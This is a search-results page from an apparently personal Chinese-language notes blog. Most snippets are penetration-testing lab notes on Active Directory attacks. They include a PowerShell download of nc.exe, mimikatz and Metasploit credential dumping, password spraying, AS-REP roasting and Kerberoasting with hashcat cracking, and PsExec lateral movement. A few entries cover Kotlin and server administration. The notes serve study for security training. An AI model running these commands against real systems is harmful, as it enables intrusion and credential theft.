進階搜尋
搜尋結果
找到了 578 個結果
【Windows】【列舉】常用命令
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe net user net user /domain net user {name} /domain net group /domain net group "Sales Department" /domain PS C:\Users\jeff> net accounts 有很多有用的信息,但讓我們首先關注鎖定閾值,這表示在鎖定之前...
【Kotlin】集合Iterable/Collection/List/Set/Map
出處 : https://blog.csdn.net/vitaviva/article/details/107587134 建立集合 不可變更集合 immutable import java.util.* import java.text.SimpleDateFormat /** * You can edit, run, and share this code. * play.kotlinlang.org */ fun main() { val list = listOf(1...
【SpringBoot】java 啟動參數
nohup java -server -Xms4096m -Xmx4096m -XX:+UseG1GC -XX:G1HeapRegionSize=1m -XX:+UseStringDeduplication -XX:MaxDirectMemorySize=1024m -XX:+UnlockDiagnosticVMOptions javaagent:/usr/AP/pinpoint/pinpoint-bootstrap-2.3.3.jar -Dpinpoint.agentId=$agent...
【Elasticsearch】容量100%
# 替換 <your_elasticsearch_host> 和 <index_name_pattern> 為實際的 Elasticsearch 主機和索引名稱模式 # 列出所有索引 curl -X GET "http://<your_elasticsearch_host>:9200/_cat/indices?v" # 删除特定模式的索引(例如,以 "log-" 开头的索引) curl -X DELETE "http://<your_elasticsearch_host>:9200/<index_n...
【滲透】Metasploit
產生payload 提權 getsystem 修改進程ID ps migrate {pid} getgiid 其他模組 hashdump: 轉儲 SAM 數據庫的內容 screenshare: 實時顯示目標機器的桌面 Kiwi: 供了 Mimikatz 的功能,可以檢索具有足夠權限的系統的憑證 掃描網路 portforwarding use auxiliary/scanner/portscan/tcp set RHOSTS 172.16.5.200 set...
【kali】解析度設定
【kali】解析度設定 【1400 X 900】 【VirtualBox】【檢視】-> 【全螢幕模式】 【VirtualBox】【虛擬畫面1】-> 【縮放至200%】
【powershell】PowerView
PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-NetDomain PS C:\Tools> Get-NetUser PS C:\Tools> Get-NetUser "Trade" PS C:\Tools> Get-NetUser | select cn PS C:\Tools> Get-NetUser | select cn,pwdlastset,lastlogon PS C:\Tools> Get-NetGroup | sel...
【powershell】PsLoggedOn
PsLoggedOn將列舉HKEY_USERS下的注冊表密鑰,以檢索已登錄用戶的安全標識符(SID)並將SID轉換為用戶名。 PsLoggedOn還將使用NetSessionEnum API查看誰通過資源共享登錄到計算機上。 然而,有一個局限性,就是PsLoggedOn依賴於遠程注冊表服務來掃描相關的密鑰。遠程注冊表服務自Windows 8以來就不再默認啟用在Windows工作站上,但系統管理員可能出於各種管理任務啟用它,以實現向後兼容性,或者用於安裝監控/部署工具、腳本、代理等。 它還在後來的Windows ...
【powershell】Sharphound
PS C:\Tools> Import-Module .\Sharphound.ps1 PS C:\Tools> Get-Help Invoke-BloodHound PS C:\Tools> Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit"
【雜湊】【AD】mimikatz
PS C:\Windows\system32> cd C:\Tools PS C:\Tools\> .\mimikatz.exe ... mimikatz # privilege::debug Privilege '20' OK #傾印所有已登錄使用者的憑證 mimikatz # sekurlsa::logonpasswords # 顯示存儲在內存中的票證 mimikatz # sekurlsa::tickets 輸出檔案 # 輸出log mimikatz # log c:\o...
【powershell】【密碼噴灑】Spray-Passwords.ps1
PS C:\Users\jeff> cd C:\Tools PS C:\Tools> powershell -ep bypass ... PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
【密碼噴灑】kerbrute
我們可以獲取並緩存Kerberos TGT。我們需要提供用戶名和密碼。如果憑證有效,我們將獲取一個TGT。這種技術的優勢在於,它僅使用兩個UDP帧來確定密碼是否有效,因為它僅發送AS-REQ並檢查響應。 我們可以使用Bash腳本或我們選擇的編程語言來自動化這種方法。幸運的是,我們還可以使用工具kerbrute,在其中實現這種技術以進行密碼噴灑。由於這個工具是跨平台的,我們可以在Windows和Linux上使用它。 讓我們使用C:\Tools中的Windows版本來執行這次攻擊。為了進行密碼噴灑,我們需要指定pa...
【shell】【impacket】【AS-REP Roasting】GetNPUsers
kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete dave的用戶帳戶選項"不需要Kerberos預驗證"已啟用
【AS-REP Roasting】Rubeus
# /nowrap,以防止將新行添加到生成的AS-REP哈希 PS C:\Users\jeff> cd C:\Tools PS C:\Tools> .\Rubeus.exe asreproast /nowrap 接下來,讓我們複製AS-REP哈希並將其粘貼到名為hashes.asreproast2的文本文件中,該文件位於使用者kali的主目錄中。我們現在可以再次啟動Hashcat來破解AS-REP哈希。 kali@kali:~$ sudo hashcat -m 18200 hashes.asrepr...
【powershell】【自訂】ldap search
function1.ps1 function LDAPSearch { param ( [string]$LDAPQuery ) $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name $DistinguishedName = ([adsi]'').distinguishedName $DirectoryE...
【Windows】【提權】Get-ObjectAcl 搜尋自己可管理帳號
Get-NetUser 找到自己 sid # 方法一 PS C:\Tools> Get-NetUser -Identity stephanie logoncount : 122 badpasswordtime : 9/27/2023 2:06:58 AM distinguishedname : CN=stephanie,CN=Users,DC=corp,DC=com objectclass : {top, person, organiza...
【Windows】登入方法
密碼 取得方法: 密碼噴灑 crackmapexe hash破解 # impacket-GetUserSPNs => Kerberoasting攻擊 取得hash # hashcat 破解 sudo impacket-GetUserSPNs -request -dc-ip 192.168.198.70 corp.com/meg http/files04.corp.com backupuser CN=Domain Admins,CN=Users,DC=corp,DC=com 2023...
【powershell】【橫移】PsExec
# 使用帳密連線至另一主機 .\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd